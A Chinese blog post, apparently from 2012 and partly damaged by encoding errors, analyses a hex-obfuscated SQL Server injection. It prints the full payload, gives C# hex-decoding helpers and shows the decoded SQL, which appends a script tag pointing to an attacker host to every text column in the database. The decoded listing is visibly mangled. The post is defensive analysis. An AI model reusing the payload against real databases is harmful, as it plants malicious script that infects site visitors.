SQL Hex Injection 十六進(jìn)制注入解決方案

發(fā)布時(shí)間：2012-11-01 00:55:07 作者：佚名

在目前國(guó)內(nèi)情況下很少有人這樣做但是作為一個(gè)DBA 這些方面是應(yīng)該考慮的，因?yàn)閟ql server 提供了很強(qiáng)大的權(quán)限控制方案當(dāng)然這個(gè)問(wèn)題更應(yīng)該從程序中去考慮對(duì)于這個(gè)情況應(yīng)該是直接在服務(wù)器上操作或者跳跳說(shuō)的光線(xiàn)注入了

今天朋友遇到一個(gè)問(wèn)題，他的sql server 數(shù)據(jù)庫(kù)被執(zhí)行了一條語(yǔ)句
dEcLaRe @s vArChAr(8000) sEt @s=0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f2536312532452537302537302536442536442536462536462532452536332536453e3c2f7363726970743e3c212d2d27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52 eXeC(@s)--
從0x可以看出這是一段十六進(jìn)制編碼的sql語(yǔ)句
于是想到將其解碼：
對(duì)于十六進(jìn)制字符串編碼和解碼的C# 方法如下：

復(fù)制代碼

代碼如下:

///
/// 從字符串轉(zhuǎn)換到16進(jìn)制表示的字符串
///
///
/// 編碼,如"utf-8","gb2312"
/// 是否每字符用逗號(hào)分隔
///
public static string ToHex(string s, string charset, bool fenge)
{
if ((s.Length % 2) != 0)
{
s += " ";//空格
//throw new ArgumentException("s is not valid chinese string!");
}
System.Text.Encoding chs = System.Text.Encoding.GetEncoding(charset);
byte[] bytes = chs.GetBytes(s);
string str = "";
for (int i = 0; i < bytes.Length; i++)
{
str += string.Format("{0:X}", bytes[i]);
if (fenge && (i != bytes.Length - 1))
{
str += string.Format("{0}", ",");
}
}
return str.ToLower();
}</p> <p> ///
/// 從16進(jìn)制轉(zhuǎn)換成utf編碼的字符串
///
///
/// 編碼,如"utf-8","gb2312"
///
public static string UnHex(string hex, string charset)
{
if (hex == null)
throw new ArgumentNullException("hex");
hex = hex.Replace(",", "");
hex = hex.Replace("\n", "");
hex = hex.Replace("\\", "");
hex = hex.Replace(" ", "");
if (hex.Length % 2 != 0)
{
hex += "20";//空格
throw new ArgumentException("hex is not a valid number!", "hex");
}
// 需要將 hex 轉(zhuǎn)換成 byte 數(shù)組。
byte[] bytes = new byte[hex.Length / 2];
for (int i = 0; i < bytes.Length; i++)
{
try
{
// 每?jī)蓚€(gè)字符是一個(gè) byte。
bytes[i] = byte.Parse(hex.Substring(i * 2, 2),
System.Globalization.NumberStyles.HexNumber);
}
catch
{
// Rethrow an exception with custom message.
throw new ArgumentException("hex is not a valid hex number!", "hex");
}
}
System.Text.Encoding chs = System.Text.Encoding.GetEncoding(charset);</p> <p> return chs.GetString(bytes);
}

于是對(duì)這段代碼進(jìn)行解碼：

復(fù)制代碼

代碼如下:

private static void TestHexStringDecode()
{
string oldSql = "6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f2536312532452537302537302536442536442536462536462532452536332536453e3c2f7363726970743e3c212d2d27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52";
Console.Write(System.Web.HttpUtility.UrlDecode( UnHex(oldSql, "utf-8").ToLower()));
}

這樣它的原型就現(xiàn)出來(lái)了

復(fù)制代碼

代碼如下:

declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a
.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch
next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['
@t '] set [' @c ']=rtrim(convert(varchar,[' @c '])) ''"> ose table_cursor deallocate table_cursor

進(jìn)行注入的人的網(wǎng)址就是a.ppmmoo.cn

大家平時(shí)應(yīng)該多注意這種注入，可以通過(guò)控制對(duì)數(shù)據(jù)庫(kù)的權(quán)限來(lái)避免上面這段代碼的注入，據(jù)朋友介紹此人是在光纖的電腦上注入的，估計(jì)用肉雞，或者服務(wù)器~~~
另外 http://home2.paulschou.net/tools/xlate/ 這個(gè)網(wǎng)址可以對(duì)Hex編碼的字符串進(jìn)行解碼